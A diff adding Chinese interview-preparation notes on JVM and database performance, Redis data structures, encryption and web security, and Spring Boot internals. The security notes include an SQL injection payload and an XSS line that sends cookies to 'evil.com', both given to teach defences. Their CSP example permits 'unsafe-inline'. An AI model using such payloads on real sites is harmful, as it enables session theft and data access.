- Memory Profiler
- Thread Profiler
**2. Arthas阿里开源**
```bash
# 安装
curl -O https://arthas.aliyun.com/arthas-boot.jar
java -jar arthas-boot.jar
# 查看 CPU 最高的线程
dashboard
# 查看方法调用耗时
trace com.example.UserService getUser
# 查看类加载
sc -d com.example.User
```
**3. VisualVM**
- JDK 自带
- 可视化界面
---
### 3. 数据库性能优化
#### **优化层次**
```
SQL 优化
索引优化
表结构优化
数据库配置优化
架构优化(读写分离、分库分表)
```
---
#### **SQL 优化**
**1. 避免 SELECT \***
```sql
-- ❌ 查询所有列
SELECT * FROM users WHERE id = 1;
-- ✅ 只查询需要的列
SELECT id, name, email FROM users WHERE id = 1;
```
**2. 避免 IN 子查询**
```sql
-- ❌ 子查询
SELECT * FROM orders WHERE user_id IN (SELECT id FROM users WHERE status = 1);
-- ✅ JOIN
SELECT o.* FROM orders o
INNER JOIN users u ON o.user_id = u.id
WHERE u.status = 1;
```
**3. 批量操作**
```sql
-- ❌ 单条插入
INSERT INTO orders (id, user_id) VALUES (1, 100);
INSERT INTO orders (id, user_id) VALUES (2, 100);
INSERT INTO orders (id, user_id) VALUES (3, 100);
-- ✅ 批量插入
INSERT INTO orders (id, user_id) VALUES
(1, 100),
(2, 100),
(3, 100);
```
**4. 使用 UNION ALL 代替 UNION**
```sql
-- ❌ UNION去重
SELECT name FROM users_a
UNION
SELECT name FROM users_b;
-- ✅ UNION ALL不去重
SELECT name FROM users_a
UNION ALL
SELECT name FROM users_b;
```
---
#### **索引优化**
**1. 创建合适的索引**
```sql
-- 为查询条件创建索引
CREATE INDEX idx_user_id ON orders(user_id);
-- 为排序创建索引
CREATE INDEX idx_created_at ON orders(created_at);
-- 联合索引(注意最左前缀)
CREATE INDEX idx_user_status ON orders(user_id, status);
```
**2. 避免索引失效**
```sql
-- ❌ 使用函数
SELECT * FROM orders WHERE YEAR(created_at) = 2024;
-- ✅ 范围查询
SELECT * FROM orders WHERE created_at >= '2024-01-01' AND created_at < '2025-01-01';
-- ❌ 隐式转换
SELECT * FROM users WHERE phone = 13800138000; -- phone 是 VARCHAR
-- ✅ 显式转换
SELECT * FROM users WHERE phone = '13800138000';
-- ❌ 前缀模糊查询
SELECT * FROM users WHERE name LIKE '%张';
-- ✅ 后缀模糊查询
SELECT * FROM users WHERE name LIKE '张%';
```
---
#### **表结构优化**
**1. 垂直拆分**
```sql
-- 拆分前(大表)
CREATE TABLE users (
id BIGINT PRIMARY KEY,
name VARCHAR(50),
email VARCHAR(100),
password VARCHAR(100),
intro TEXT, -- 简介(可能很长)
settings JSON, -- 设置
created_at DATETIME
);
-- 拆分后
CREATE TABLE users_base (
id BIGINT PRIMARY KEY,
name VARCHAR(50),
email VARCHAR(100),
password VARCHAR(100),
created_at DATETIME
);
CREATE TABLE users_ext (
user_id BIGINT PRIMARY KEY,
intro TEXT,
settings JSON
);
```
**2. 水平拆分**
```sql
-- 拆分前(单表数据量大)
CREATE TABLE orders (
id BIGINT PRIMARY KEY,
user_id BIGINT,
amount DECIMAL(10,2),
created_at DATETIME
); -- 1 亿条数据
-- 拆分后(按时间分表)
CREATE TABLE orders_2024_01 (
id BIGINT PRIMARY KEY,
user_id BIGINT,
amount DECIMAL(10,2),
created_at DATETIME
);
CREATE TABLE orders_2024_02 (
...
);
```
---
### 4. JVM 性能调优
#### **常见问题**
**1. 内存泄漏**
```java
// ❌ 内存泄漏
public class Cache {
private static final Map<String, Object> cache = new HashMap<>();
public void put(String key, Object value) {
cache.put(key, value); // 永不清理,内存泄漏
}
}
// ✅ 使用 Guava Cache
public class Cache {
private static final Cache<String, Object> cache = CacheBuilder.newBuilder()
.expireAfterWrite(10, TimeUnit.MINUTES)
.maximumSize(10000)
.build();
public void put(String key, Object value) {
cache.put(key, value);
}
}
```
---
**2. 频繁 GC**
```bash
# 查看 GC 情况
jstat -gcutil <pid> 1000
# 输出
S0 S1 E O M CCS YGC YGCT FGC FGCT GCT
0.00 70.15 80.23 65.40 95.12 90.23 1523 45.236 10 12.345 57.581
# YGC年轻代 GC 次数(正常 1000 次/小时以下)
# FGC老年代 GC 次数(应该接近 0
# GCT总 GC 时间(应该 < 5%
```
**调优**
```bash
# 调整堆内存大小
-Xms4g -Xmx4g
# 调整年轻代大小
-Xmn2g
# 使用 G1 收集器(大堆内存推荐)
-XX:+UseG1GC
# 调整 GC 并行线程
-XX:ParallelGCThreads=8
```
---
**3. CPU 100%**
```bash
# 查看最耗 CPU 的线程
top -H -p <pid>
# 转换线程 ID 为 16 进制
printf "%x" <tid>
# 查看线程堆栈
jstack <pid> | grep <tid-in-hex> -A 20
```
---
### 5. 接口性能优化
#### **优化技巧**
**1. 异步处理**
```java
// ❌ 同步处理(慢)
@PostMapping("/order")
public String createOrder(@RequestBody Order order) {
// 1. 保存订单100ms
orderService.save(order);
// 2. 发送邮件500ms
emailService.send(order);
// 3. 发送短信300ms
smsService.send(order);
// 总耗时900ms
return "success";
}
// ✅ 异步处理(快)
@PostMapping("/order")
public String createOrder(@RequestBody Order order) {
// 1. 保存订单100ms
orderService.save(order);
// 2. 异步发送邮件、短信
CompletableFuture.runAsync(() -> {
emailService.send(order);
smsService.send(order);
});
// 总耗时100ms
return "success";
}
```
---
**2. 缓存**
```java
// ❌ 每次查询数据库
public User getUser(Long userId) {
return userMapper.selectById(userId); // 50ms
}
// ✅ 使用缓存
@Cacheable(value = "users", key = "#userId")
public User getUser(Long userId) {
return userMapper.selectById(userId); // 第一次 50ms后续 1ms
}
```
---
**3. 批量查询**
```java
// ❌ 循环查询N+1 问题)
List<Order> orders = orderMapper.selectList();
for (Order order : orders) {
User user = userMapper.selectById(order.getUserId()); // N 次查询
order.setUser(user);
}
// ✅ 批量查询
List<Order> orders = orderMapper.selectList();
Set<Long> userIds = orders.stream()
.map(Order::getUserId)
.collect(Collectors.toSet());
Map<Long, User> userMap = userMapper.selectByIds(userIds); // 1 次查询
orders.forEach(o -> o.setUser(userMap.get(o.getUserId())));
```
---
**4. 连接池优化**
```yaml
# HikariCP 配置
spring:
datasource:
hikari:
minimum-idle: 10 # 最小空闲连接
maximum-pool-size: 50 # 最大连接池大小
connection-timeout: 30000 # 连接超时时间
idle-timeout: 600000 # 空闲连接超时
max-lifetime: 1800000 # 连接最大生命周期
```
---
### 6. 全链路压测
#### **压测工具**
**1. JMeter**
- 图形化界面
- 支持分布式压测
- 可录制脚本
**2. LocustPython**
```python
from locust import HttpUser, task, between
class WebsiteUser(HttpUser):
wait_time = between(1, 3)
@task
def index(self):
self.client.get("/")
@task(3)
def api(self):
self.client.get("/api/users")
```
**运行**
```bash
locust -f locustfile.py --host=https://example.com
```
---
#### **压测流程**
```
1. 制定压测计划
- 确定目标QPS、响应时间
- 确定场景(秒杀、日常流量)
2. 编写压测脚本
- 模拟真实用户行为
- 准备测试数据
3. 执行压测
- 逐步加压
- 记录指标
4. 分析结果
- 找出瓶颈
- 优化后再次压测
5. 容量评估
- 确定系统容量
- 预留缓冲(如 30%
```
---
#### **压测指标**
| 指标 | 说明 | 目标值 |
|------|------|--------|
| **QPS** | 每秒请求数 | 根据业务需求 |
| **响应时间** | P99 < 200ms | 根据业务需求 |
| **错误率** | 错误请求比例 | < 0.1% |
| **CPU 使用率** | CPU 占用 | < 70% |
| **内存使用率** | 内存占用 | < 80% |
| **TPS** | 每秒事务数 | 根据业务需求 |
---
### 7. 实际项目案例
#### **案例 1接口响应时间从 2s 优化到 100ms**
**问题**
- 用户列表接口响应时间 2 秒
- 数据库查询慢
**分析**
```sql
EXPLAIN SELECT * FROM users WHERE status = 1;
-- type: ALL全表扫描
-- rows: 1000000
```
**优化**
```sql
-- 1. 添加索引
CREATE INDEX idx_status ON users(status);
-- 2. 只查询需要的字段
SELECT id, name, email FROM users WHERE status = 1;
-- 3. 添加缓存
@Cacheable("users")
```
**结果**:响应时间降至 100ms
---
#### **案例 2解决频繁 GC 问题**
**问题**
- 应用频繁 Full GC
- CPU 使用率 100%
**分析**
```bash
# 查看 GC 日志
jstat -gcutil <pid> 1000
# FGC 频繁,说明老年代内存不足
```
**优化**
```bash
# 调整 JVM 参数
-Xms8g -Xmx8g # 增加堆内存
-Xmn4g # 调整年轻代大小
-XX:+UseG1GC # 使用 G1 收集器
-XX:MaxGCPauseMillis=200 # 设置最大 GC 暂停时间
```
**结果**Full GC 次数从每小时 10 次降至 0 次
---
### 8. 阿里 P7 加分项
**深度理解**
- 理解性能优化的底层原理(操作系统、网络、数据库)
- 理解各种性能分析工具的实现原理
- 理解性能测试的统计学方法
**实战经验**
- 有将接口从秒级优化到毫秒级的经验
- 有解决线上性能问题的经验
- 有全链路压测的经验
**架构能力**
- 能设计高性能架构
- 能设计性能监控体系
- 能制定性能优化规范
**技术选型**
- 了解各种性能分析工具JProfiler、Arthas、SkyWalking
- 了解分布式追踪系统Zipkin、Jaeger
- 能根据业务特点制定性能指标

0
questions/redis-architecture.md Normal file
View File

215
questions/redis-data-structure.md Normal file
View File

@@ -0,0 +1,215 @@
# Redis 数据结构
## 问题
1. Redis 有哪些数据结构?底层实现是什么?
2. String 类型的应用场景?
3. Hash 和 String 的区别?
4. List 的应用场景?
5. Set 和 ZSet 的区别?
6. Bitmap、HyperLogLog、GEO 的应用?
---
## 标准答案
### 1. Redis 数据类型
| 类型 | 底层实现 | 应用场景 |
|------|---------|----------|
| **String** | SDS | 缓存、计数器、分布式锁 |
| **Hash** | 压缩列表/哈希表 | 对象存储、购物车 |
| **List** | 双向链表/压缩列表 | 消息队列、最新列表 |
| **Set** | 哈希表/整数集合 | 标签、共同关注 |
| **ZSet** | 跳表/哈希表 | 排行榜、延时队列 |
| **Bitmap** | String位操作 | 签到、在线用户 |
| **HyperLogLog** | String基数统计 | UV 统计 |
| **GEO** | ZSet经纬度编码 | 附近的人 |
---
### 2. StringSDS - Simple Dynamic String
**结构**
```c
struct sdshdr {
int len; // 已使用长度
int free; // 剩余空间
char buf[]; // 字节数组
};
```
**优势**
- O(1) 获取长度
- 防止缓冲区溢出
- 减少内存分配次数
**应用**
```bash
# 缓存
SET user:1001 '{"id":1001,"name":"Alice"}'
GET user:1001
# 计数器
INCR view_count:1001
DECR stock:1001
# 分布式锁
SET lock:order:1001 "uuid" NX PX 30000
```
---
### 3. Hash
**结构**
```bash
HSET user:1001 name "Alice" age 25 email "alice@example.com"
HGET user:1001 name
HGETALL user:1001
```
**底层**
- 字段少(< 512压缩列表ziplist
- 字段多(≥ 512哈希表hashtable
**应用**
```java
// 对象存储(推荐 Hash而非 String
redisTemplate.opsForHash().putAll("user:1001", Map.of(
"name", "Alice",
"age", "25"
));
// 购物车
redisTemplate.opsForHash().put("cart:1001", "product:1001", "2");
```
---
### 4. List
**结构**
```bash
LPUSH list:msgs "msg1" "msg2" "msg3" # 左侧插入
RPOP list:msgs # 右侧弹出
```
**底层**
- 元素少(< 512压缩列表ziplist
- 元素多(≥ 512双向链表linkedlist
- Redis 3.2+quicklistziplist + linkedlist
**应用**
```bash
# 消息队列
LPUSH queue:email '{"to":"alice@example.com","subject":"Hello"}'
RPOP queue:email
# 最新列表
LPUSH timeline:1001 "post1" "post2"
LRANGE timeline:1001 0 9 # 最新 10 条
```
---
### 5. Set vs ZSet
**Set无序集合**
```bash
SADD tags:article:1001 "java" "redis" "mysql"
SMEMBERS tags:article:1001
SISMEMBER tags:article:1001 "java"
SINTER tags:user:1001 tags:article:1001 # 交集
```
**底层**
- 元素少(< 512整数集合intset
- 元素多(≥ 512哈希表hashtable
---
**ZSet有序集合**
```bash
ZADD rank:score 100 "player1" 200 "player2" 150 "player3"
ZREVRANGE rank:score 0 9 WITHSCORES # Top 10
ZRANK rank:score "player1" # 排名
ZSCORE rank:score "player1" # 分数
```
**底层**
- 元素少(< 128压缩列表ziplist
- 元素多(≥ 128跳表skiplist + 哈希表hashtable
---
### 6. Bitmap
**原理**:用 bit 位表示状态0 或 1
```bash
# 签到
SETBIT sign:2024:02:28:1001 0 1 # 用户 1001 在第 0 天签到
SETBIT sign:2024:02:28:1001 4 1 # 用户 1001 在第 4 天签到
# 统计签到天数
BITCOUNT sign:2024:02:28:1001
# 用户 1001 和 1002 共同签到的天数
BITOP AND result sign:2024:02:28:1001 sign:2024:02:28:1002
BITCOUNT result
```
---
### 7. HyperLogLog
**用途**:基数统计(不重复元素个数)
**优点**内存占用极小12 KB
```bash
PFADD uv:2024:02:28 user:1001 user:1002 user:1003
PFCOUNT uv:2024:02:28 # 3
# 合并多个 HyperLogLog
PFMERGE uv:2024:02:01-28 uv:2024:02:01 uv:2024:02:02 ...
```
**误差率**< 1%
---
### 8. GEO地理位置
```bash
# 添加位置
GEOADD locations:users 116.404 39.915 "user:1001" # 北京
# 查找附近的人5 km 内)
GEORADIUS locations:users 116.404 39.915 5 km
# 计算距离
GEODIST locations:users user:1001 user:1002
```
**底层**ZSet经纬度编码为 score
---
### 9. 阿里 P7 加分项
**深度理解**
- 理解 SDS 和 C 字符串的区别
- 理解跳表的实现原理
- 理解压缩列表的优缺点
**实战经验**
- 有选择合适数据类型的经验
- 有大数据量下的优化经验
- 有 Redis 内存优化的经验
**架构能力**
- 能设计基于 Redis 的业务方案
- 能设计 Redis 集群方案
- 能设计 Redis 监控体系

617
questions/security-encryption.md Normal file
View File

@@ -0,0 +1,617 @@
# 加密与安全
## 问题
1. 对称加密和非对称加密的区别是什么?
2. Base64 是加密吗?为什么?
3. 什么是数字签名?如何防止数据篡改?
4. HTTPS 中的 TLS 握手过程是怎样的?
5. 什么是中间人攻击?如何防范?
6. SQL 注入和 XSS 攻击的原理和防范措施?
7. 密码存储的最佳实践是什么?
8. 在实际项目中如何保证数据安全?
---
## 标准答案
### 1. 对称加密 vs 非对称加密
#### **对称加密**
**特点**:加密和解密使用同一个密钥。
```
加密:明文 + 密钥 → 密文
解密:密文 + 密钥 → 明文
```
**常见算法**
- **AES**Advanced Encryption Standard推荐
- **DES**Data Encryption Standard已过时密钥太短
- **3DES**DES 的改进,但速度慢
- **RC4**:已不安全
**Java 示例**
```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import java.util.Base64;
public class AESExample {
public static void main(String[] args) throws Exception {
// 生成密钥
KeyGenerator keyGen = KeyGenerator.getInstance("AES");
keyGen.init(256); // AES-256
SecretKey secretKey = keyGen.generateKey();
// 加密
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.ENCRYPT_MODE, secretKey);
byte[] encrypted = cipher.doFinal("Hello World".getBytes());
System.out.println("加密:" + Base64.getEncoder().encodeToString(encrypted));
// 解密
cipher.init(Cipher.DECRYPT_MODE, secretKey);
byte[] decrypted = cipher.doFinal(encrypted);
System.out.println("解密:" + new String(decrypted));
}
}
```
**优点**
- 速度快(比非对称加密快 100-1000 倍)
- 适合加密大量数据
**缺点**
- 密钥分发困难(如何安全地共享密钥?)
---
#### **非对称加密**
**特点**:加密和解密使用不同的密钥(公钥和私钥)。
```
公钥加密:明文 + 公钥 → 密文
私钥解密:密文 + 私钥 → 明文
或者:
私钥签名:明文 + 私钥 → 签名
公钥验签:签名 + 公钥 → 验证
```
**常见算法**
- **RSA**:最常用
- **ECC**(椭圆曲线加密):密钥更短,速度更快
- **DSA**:数字签名算法
**Java 示例**
```java
import java.security.*;
import javax.crypto.Cipher;
import java.util.Base64;
public class RSAExample {
public static void main(String[] args) throws Exception {
// 生成密钥对
KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA");
keyGen.initialize(2048);
KeyPair keyPair = keyGen.generateKeyPair();
PublicKey publicKey = keyPair.getPublic();
PrivateKey privateKey = keyPair.getPrivate();
// 公钥加密
Cipher cipher = Cipher.getInstance("RSA");
cipher.init(Cipher.ENCRYPT_MODE, publicKey);
byte[] encrypted = cipher.doFinal("Hello World".getBytes());
System.out.println("加密:" + Base64.getEncoder().encodeToString(encrypted));
// 私钥解密
cipher.init(Cipher.DECRYPT_MODE, privateKey);
byte[] decrypted = cipher.doFinal(encrypted);
System.out.println("解密:" + new String(decrypted));
}
}
```
**优点**
- 无需安全分发密钥(公钥可以公开)
- 可用于数字签名
**缺点**
- 速度慢(比对称加密慢 100-1000 倍)
- 不适合加密大量数据
---
#### **混合加密HTTPS 使用)**
```
1. 使用非对称加密协商对称密钥
2. 使用对称密钥加密数据
```
**优点**
- 结合两者优点(安全 + 速度)
---
### 2. Base64 是加密吗?
**答案:不是!**
**Base64 是编码,不是加密。**
**目的**
- 将二进制数据转换为 ASCII 字符串
- 方便在文本协议中传输(如 HTTP、Email
**原理**
```
二进制01001000 0110101 01011011
Base64SGVsbG8=
编码表64 个字符):
A-Z (26) + a-z (26) + 0-9 (10) + + / (2) = 64
```
**特点**
- 可逆(可解码)
- 无密钥(任何人都能解码)
- 数据会增大 33%
**示例**
```java
import java.util.Base64;
public class Base64Example {
public static void main(String[] args) {
String original = "Hello World";
// 编码
String encoded = Base64.getEncoder().encodeToString(original.getBytes());
System.out.println("编码:" + encoded); // SGVsbG8gV29ybGQ=
// 解码
String decoded = new String(Base64.getDecoder().decode(encoded));
System.out.println("解码:" + decoded); // Hello World
}
}
```
**错误用法**
```java
// ❌ 用 Base64 存储密码(不安全)
String password = "123456";
String encoded = Base64.getEncoder().encodeToString(password.getBytes());
// 存储到数据库
// 攻击者可以直接解码!
```
---
### 3. 数字签名
#### **原理**
数字签名用于验证:
1. **完整性**:数据未被篡改
2. **身份认证**:发送者确实是声称的人
3. **不可抵赖**:发送者无法否认发送过
**流程**
```
发送方(签名):
1. 对原文计算哈希hash = SHA256(原文)
2. 用私钥加密哈希signature = RSA_Encrypt(hash, 私钥)
3. 发送:原文 + signature
接收方(验签):
1. 对原文计算哈希hash1 = SHA256(原文)
2. 用公钥解密签名hash2 = RSA_Decrypt(signature, 公钥)
3. 对比 hash1 和 hash2
- 相同 → 签名有效
- 不同 → 数据被篡改
```
---
#### **Java 实现**
```java
import java.security.*;
import java.util.Base64;
public class DigitalSignatureExample {
public static void main(String[] args) throws Exception {
// 生成密钥对
KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA");
keyGen.initialize(2048);
KeyPair keyPair = keyGen.generateKeyPair();
PrivateKey privateKey = keyPair.getPrivate();
PublicKey publicKey = keyPair.getPublic();
// 待签名数据
String data = "重要合同内容";
// 签名
Signature signature = Signature.getInstance("SHA256withRSA");
signature.initSign(privateKey);
signature.update(data.getBytes());
byte[] signatureBytes = signature.sign();
System.out.println("签名:" + Base64.getEncoder().encodeToString(signatureBytes));
// 验签
signature.initVerify(publicKey);
signature.update(data.getBytes());
boolean isValid = signature.verify(signatureBytes);
System.out.println("验签结果:" + isValid);
}
}
```
---
#### **实际应用**
1. **软件签名**:验证软件来源
2. **代码签名**:防止代码被篡改
3. **PDF 签名**:电子合同
4. **JWTJSON Web Token**API 认证
```java
// JWT 示例
String token = Jwts.builder()
.setSubject("user123")
.signWith(Keys.hmacShaKeyFor(secretKey), SignatureAlgorithm.HS256)
.compact();
// 验证 JWT
Claims claims = Jwts.parserBuilder()
.setSigningKey(secretKey)
.build()
.parseClaimsJws(token)
.getBody();
```
---
### 4. SQL 注入攻击
#### **原理**
攻击者在输入中注入恶意 SQL 代码。
**示例**
```java
// ❌ 不安全的代码(拼接 SQL
String username = request.getParameter("username");
String password = request.getParameter("password");
String sql = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'";
// 攻击者输入:
username = "admin' OR '1'='1";
password = "anything"
// 实际执行的 SQL
SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = 'anything'
// 结果:永远为真,绕过密码验证!
```
**危害**
- 绕过认证
- 窃取数据
- 删除数据
- 提升权限
---
#### **防范措施**
**1. 使用预编译语句PreparedStatement**
```java
// ✅ 安全代码
String sql = "SELECT * FROM users WHERE username = ? AND password = ?";
PreparedStatement stmt = connection.prepareStatement(sql);
stmt.setString(1, username);
stmt.setString(2, password);
ResultSet rs = stmt.executeQuery();
```
**原理**参数化查询SQL 结构固定,参数不会被解析为 SQL 代码。
---
**2. 输入验证**
```java
// 验证用户名格式
if (!username.matches("^[a-zA-Z0-9_]{3,20}$")) {
throw new IllegalArgumentException("用户名格式不正确");
}
```
---
**3. 最小权限原则**
```sql
-- 应用用户只授予必要权限
GRANT SELECT, INSERT, UPDATE ON app_db.* TO 'app_user'@'localhost';
-- 不要授予 DROP、ALTER 等危险权限
```
---
**4. 使用 ORM**
```java
// JPA/Hibernate 自动防止 SQL 注入
User user = userRepository.findByUsernameAndPassword(username, password);
```
---
### 5. XSS 攻击(跨站脚本攻击)
#### **原理**
攻击者在网页中注入恶意 JavaScript 代码。
**示例**
```html
<!-- 用户输入评论 -->
<script>
// 攻击者注入的代码
fetch('https://evil.com/steal?cookie=' + document.cookie);
</script>
```
**危害**
- 窃取 Cookie
- 会话劫持
- 重定向到钓鱼网站
- 篡改网页内容
---
#### **防范措施**
**1. 输出转义**
```java
// 使用 Spring 的 HTML 转义
import org.springframework.web.util.HtmlUtils;
String userInput = "<script>alert('XSS')</script>";
String escaped = HtmlUtils.htmlEscape(userInput);
// 输出:&lt;script&gt;alert('XSS')&lt;/script&gt;
```
---
**2. CSPContent Security Policy**
```http
# HTTP
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'
```
---
**3. HttpOnly Cookie**
```java
// 设置 Cookie 为 HttpOnlyJavaScript 无法访问)
Cookie cookie = new Cookie("session", token);
cookie.setHttpOnly(true);
cookie.setSecure(true); // 仅 HTTPS 传输
response.addCookie(cookie);
```
---
**4. 输入验证**
```java
// 白名单验证
if (!comment.matches("[a-zA-Z0-9 \\u4e00-\\u9fa5]+")) {
throw new IllegalArgumentException("评论包含非法字符");
}
```
---
### 6. 密码存储
#### **错误做法**
```java
// ❌ 明文存储
password = "123456";
// ❌ Base64 编码(可逆)
password = Base64.getEncoder().encodeToString("123456".getBytes());
// ❌ MD5 哈希(易被彩虹表破解)
password = DigestUtils.md5Hex("123456"); // e10adc3949ba59abbe56e057f20f883e
```
---
#### **正确做法BCrypt**
**特点**
- 自动加盐Salt
- 慢哈希(防暴力破解)
- 可调整计算成本
```java
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
public class PasswordExample {
public static void main(String[] args) {
BCryptPasswordEncoder encoder = new BCryptPasswordEncoder();
// 加密(自动加盐)
String rawPassword = "123456";
String encodedPassword = encoder.encode(rawPassword);
System.out.println("加密后:" + encodedPassword);
// 输出:$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
// 验证
boolean matches = encoder.matches(rawPassword, encodedPassword);
System.out.println("验证结果:" + matches); // true
}
}
```
---
#### **密码存储最佳实践**
1. **使用慢哈希算法**
- BCrypt推荐
- Argon2最新
- PBKDF2
- Scrypt
2. **每个密码独立的盐**
```java
salt = random_bytes(16);
hashed_password = hash(password + salt);
```
3. **调整计算成本**
```java
// BCrypt 成本参数10-12 为宜)
BCryptPasswordEncoder encoder = new BCryptPasswordEncoder(12);
```
4. **不要自己发明加密算法**
---
### 7. HTTPS 完整流程
```
客户端 服务器
│ │
│─────── ClientHello ────────────→│
支持的加密套件、随机数1
│ │
│←────── ServerHello ─────────────│
选择的加密套件、随机数2、证书
│←────── Certificate ─────────────│
│ │
│─────── 验证证书 ────────────────│
│ (检查 CA 签名、有效期等) │
│ │
│─────── 生成随机数3 ─────────────→│
│─────── 用公钥加密随机数3 ─────────→│
│ │
│ 服务器用私钥解密
│ 生成会话密钥:
│ master_secret = PRF(随机数1, 随机数2, 随机数3)
│ │
│←─────── ChangeCipherSpec ────────│
│←─────── Finished ────────────────│
│ (用会话密钥加密,证明安全) │
│ │
│─────── ChangeCipherSpec ─────────→│
│─────── Finished ────────────────→│
│ (用会话密钥加密) │
│ │
│══════ 加密通信 ══════════════════│
│ (使用会话密钥对称加密) │
```
---
### 8. 中间人攻击
#### **原理**
攻击者拦截并可能篡改通信双方的通信内容。
```
客户端 攻击者 服务器
│ │ │
├─── HTTPS 请求 ────→│ │
│ ├─── 伪造请求 ───────→│
│ │ │
│←──── 伪造响应 ──────│←──── 真实响应 ──────│
│←────────────────────│ │
```
---
#### **防范措施**
**1. HTTPS + 证书验证**
- 验证服务器证书
- 检查证书链
- 验证证书有效期
**2. HSTSHTTP Strict Transport Security**
```http
Strict-Transport-Security: max-age=31536000; includeSubDomains
```
**3. 证书固定Certificate Pinning**
```java
// 移动应用中固定证书
public class CertificatePinner {
private static final String KNOWN_CERT = "SHA256:AAAAAAAAA...";
public void verifyCertificate(X509Certificate cert) {
String certHash = calculateCertificateHash(cert);
if (!certHash.equals(KNOWN_CERT)) {
throw new SSLException("证书不匹配");
}
}
}
```
---
### 9. 实际项目安全实践
#### **安全检查清单**
- [ ] 所有用户输入都经过验证和转义
- [ ] 密码使用 BCrypt 存储且每次加不同的盐
- [ ] 敏感数据在传输时使用 HTTPS 加密
- [ ] 敏感数据在存储时使用 AES 加密
- [ ] API 使用 JWT 或 OAuth2 认证
- [ ] 实施 CSRF 防护CSRF Token
- [ ] 实施 CORS 限制
- [ ] 设置安全响应头CSP、X-Frame-Options 等)
- [ ] 定期进行安全审计和渗透测试
- [ ] 使用依赖扫描工具检查漏洞
---
### 10. 阿里 P7 加分项
**深度理解**
- 理解各种加密算法的数学原理
- 理解 TLS 1.3 的改进
- 理解零知识证明等高级加密技术
**实战经验**
- 有处理线上安全漏洞的经验
- 有设计安全架构的经验
- 有加密性能优化的经验
**架构能力**
- 能设计安全的认证和授权体系
- 能设计数据加密方案
- 能制定安全开发规范
**合规要求**
- 了解 GDPR、等保等安全合规要求
- 有安全审计和风险评估经验

369
questions/spring-boot.md Normal file
View File

@@ -0,0 +1,369 @@
# Spring Boot 核心原理
## 问题
1. Spring Boot 的自动配置原理是什么?
2. @SpringBootApplication 注解包含哪些核心注解?
3. Spring Boot 的启动流程是怎样的?
4. 什么是条件注解(@Conditional
5. Spring Boot 如何实现配置文件加载?
6. Spring Boot 的健康检查和监控如何实现?
7. Spring Boot 的 Starter 原理是什么?
---
## 标准答案
### 1. @SpringBootApplication 注解
```java
@SpringBootConfiguration // 1. 配置类
@EnableAutoConfiguration // 2. 自动配置
@ComponentScan // 3. 组件扫描
public @interface SpringBootApplication {
}
```
---
#### **1. @SpringBootConfiguration**
```java
@Configuration // 本质上是 @Configuration
public @interface SpringBootConfiguration {
}
```
**作用**:标记为配置类(等同于 XML 配置文件)
---
#### **2. @EnableAutoConfiguration**
```java
@AutoConfigurationPackage // 自动配置包
@Import(AutoConfigurationImportSelector.class) // 导入自动配置类
public @interface EnableAutoConfiguration {
}
```
**核心**`AutoConfigurationImportSelector`
```java
// 加载 META-INF/spring.factories 中的自动配置类
String[] configurations = SpringFactoriesLoader.loadFactoryNames(
getSpringFactoriesLoaderFactoryClass(),
getBeanClassLoader()
);
```
---
#### **3. @ComponentScan**
```java
@ComponentScan(
excludeFilters = { // 排除过滤器
@Filter(type = FilterType.CUSTOM, classes = TypeExcludeFilter.class),
@Filter(type = FilterType.CUSTOM, classes = AutoConfigurationExcludeFilter.class)
}
)
```
**作用**:扫描 `@Component``@Service``@Repository``@Controller` 等注解
---
### 2. 自动配置原理
#### **核心流程**
```
1. @EnableAutoConfiguration
2. 加载 META-INF/spring.factories
3. 根据 @Conditional 条件注解决定是否加载配置
4. 注册 Bean
```
---
#### **spring.factories 示例**
```properties
# spring-boot-autoconfigure-2.7.0.jar
org.springframework.boot.autoconfigure.EnableAutoConfiguration=\
org.springframework.boot.autoconfigure.admin.SpringApplicationAdminJmxAutoConfiguration,\
org.springframework.boot.autoconfigure.aop.AopAutoConfiguration,\
org.springframework.boot.autoconfigure.amqp.RabbitAutoConfiguration,\
...
```
---
#### **条件注解示例**
```java
@Configuration
@ConditionalOnClass(DataSource.class) // 类路径存在 DataSource
@ConditionalOnMissingBean(DataSource.class) // 容器中不存在 DataSource Bean
@EnableConfigurationProperties(DataSourceProperties.class)
public class DataSourceAutoConfiguration {
@Bean
public DataSource dataSource(DataSourceProperties properties) {
// 创建 DataSource
return properties.initializeDataSourceBuilder().build();
}
}
```
---
### 3. Spring Boot 启动流程
```java
@SpringBootApplication
public class Application {
public static void main(String[] args) {
SpringApplication.run(Application.class, args);
}
}
```
---
#### **核心步骤**
```
1. 创建 SpringApplication
2. 准备 Environment
3. 打印 Banner
4. 创建 ApplicationContext
5. 刷新 Context加载 Bean
6. 调用 RunnerApplicationRunner、CommandLineRunner
```
---
#### **源码分析**
```java
public SpringApplication(Class<?>... primarySources) {
// 1. 保存主配置类
this.primarySources = new LinkedHashSet<>(Arrays.asList(primarySources));
// 2. 推断 Web 应用类型SERVLET、REACTIVE、NONE
this.webApplicationType = WebApplicationType.deduceFromClasspath();
// 3. 加载 ApplicationContextInitializer
setInitializers((Collection) getSpringFactoriesInstances(ApplicationContextInitializer.class));
// 4. 加载 ApplicationListener
setListeners((Collection) getSpringFactoriesInstances(ApplicationListener.class));
// 5. 推断主类main 方法所在类)
this.mainApplicationClass = deduceMainApplicationClass();
}
```
---
### 4. 配置文件加载
#### **加载顺序**
```
1. 命令行参数(--server.port=8081
2. Java 系统属性System.getProperties()
3. 操作系统环境变量
4. JAR 外部的 application-{profile}.properties
5. JAR 内部的 application-{profile}.properties
6. JAR 外部的 application.properties
7. JAR 内部的 application.properties
8. @PropertySource
9. 默认属性SpringApplication.setDefaultProperties
```
---
#### **配置文件示例**
```yaml
# application.yml
server:
port: 8080
spring:
profiles:
active: dev
---
spring:
config:
activate:
on-profile: dev
datasource:
url: jdbc:mysql://localhost:3306/dev
---
spring:
config:
activate:
on-profile: prod
datasource:
url: jdbc:mysql://prod-db:3306/prod
```
---
### 5. 自定义 Starter
#### **步骤**
